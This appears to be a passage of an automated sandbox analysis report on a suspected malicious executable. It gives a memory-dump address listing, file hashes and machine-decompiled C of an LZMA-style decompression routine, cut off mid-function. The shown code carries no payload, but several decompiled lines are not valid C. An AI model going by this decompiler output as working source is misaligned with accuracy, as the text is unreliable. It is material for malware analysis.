                                                                                                                          0x004064a0
                                                                                                                          0x00406474
                                                                                                                          0x00406474
                                                                                                                          0x00406474
                                                                                                                          0x00406474
                                                                                                                          0x00000000
                                                                                                                          0x004064a2
                                                                                                                          0x004064a2
                                                                                                                          0x00000000
                                                                                                                          0x004064a2
                                                                                                                          0x004064a0
                                                                                                                          0x00406426
                                                                                                                          0x00406426
                                                                                                                          0x00406429
                                                                                                                          0x0040642b
                                                                                                                          0x0040642e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040618d
                                                                                                                          0x0040618d
                                                                                                                          0x00406191
                                                                                                                          0x004067d6
                                                                                                                          0x004067d6
                                                                                                                          0x00000000
                                                                                                                          0x004067d6
                                                                                                                          0x00406197
                                                                                                                          0x00406197
                                                                                                                          0x0040619a
                                                                                                                          0x0040619d
                                                                                                                          0x004061a0
                                                                                                                          0x004061a3
                                                                                                                          0x004061a6
                                                                                                                          0x004061a9
                                                                                                                          0x004061ab
                                                                                                                          0x004061ae
                                                                                                                          0x004061b1
                                                                                                                          0x004061b4
                                                                                                                          0x004061b6
                                                                                                                          0x004061b6
                                                                                                                          0x004061b6
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406318
                                                                                                                          0x00406318
                                                                                                                          0x0040631c
                                                                                                                          0x004067e2
                                                                                                                          0x004067e2
                                                                                                                          0x00000000
                                                                                                                          0x004067e2
                                                                                                                          0x00406322
                                                                                                                          0x00406322
                                                                                                                          0x00406325
                                                                                                                          0x00406328
                                                                                                                          0x0040632b
                                                                                                                          0x0040632d
                                                                                                                          0x0040632d
                                                                                                                          0x0040632d
                                                                                                                          0x00406330
                                                                                                                          0x00406333
                                                                                                                          0x00406336
                                                                                                                          0x00406339
                                                                                                                          0x0040633c
                                                                                                                          0x0040633f
                                                                                                                          0x00406340
                                                                                                                          0x00406342
                                                                                                                          0x00406342
                                                                                                                          0x00406342
                                                                                                                          0x00406345
                                                                                                                          0x00406348
                                                                                                                          0x0040634b
                                                                                                                          0x0040634e
                                                                                                                          0x0040634e
                                                                                                                          0x0040634e
                                                                                                                          0x00406351
                                                                                                                          0x00406353
                                                                                                                          0x00406353
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406595
                                                                                                                          0x00406595
                                                                                                                          0x00406595
                                                                                                                          0x00406599
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040659f
                                                                                                                          0x0040659f
                                                                                                                          0x004065a2
                                                                                                                          0x004065a5
                                                                                                                          0x004065a8
                                                                                                                          0x004065aa
                                                                                                                          0x004065aa
                                                                                                                          0x004065aa
                                                                                                                          0x004065ad
                                                                                                                          0x004065b0
                                                                                                                          0x004065b3
                                                                                                                          0x004065b6
                                                                                                                          0x004065b9
                                                                                                                          0x004065bc
                                                                                                                          0x004065bd
                                                                                                                          0x004065bf
                                                                                                                          0x004065bf
                                                                                                                          0x004065bf
                                                                                                                          0x004065c2
                                                                                                                          0x004065c5
                                                                                                                          0x004065c8
                                                                                                                          0x004065cb
                                                                                                                          0x004065ce
                                                                                                                          0x004065d2
                                                                                                                          0x004065d4
                                                                                                                          0x004065d7
                                                                                                                          0x00000000
                                                                                                                          0x004065d9
                                                                                                                          0x004065d9
                                                                                                                          0x00406356
                                                                                                                          0x00406356
                                                                                                                          0x00000000
                                                                                                                          0x00406356
                                                                                                                          0x004065d7
                                                                                                                          0x0040680c
                                                                                                                          0x0040680c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405e3b
                                                                                                                          0x00406843
                                                                                                                          0x00406843
                                                                                                                          0x00000000
                                                                                                                          0x00406843
                                                                                                                          0x00406690
                                                                                                                          0x00406710
                                                                                                                          0x004066d9

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 8ad8b3a7fce677aa33c13c02e3180aa90519ee056083dbfcd0f6a1ae91265e6c
                                                                                                                          • Instruction ID: 95af8839098f806f541805b71f16133a603fad5641f47eebb8f014e75b9041d1
                                                                                                                          • Opcode Fuzzy Hash: 8ad8b3a7fce677aa33c13c02e3180aa90519ee056083dbfcd0f6a1ae91265e6c
                                                                                                                          • Instruction Fuzzy Hash: 58A13371D00229CBDF28CFA8C8447ADBBB1FF44305F25856AD856BB281D7789A86DF44
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004065DE, Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 98%
                                                                                                                          			E004065DE() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M0040684B))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8)); // executed
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
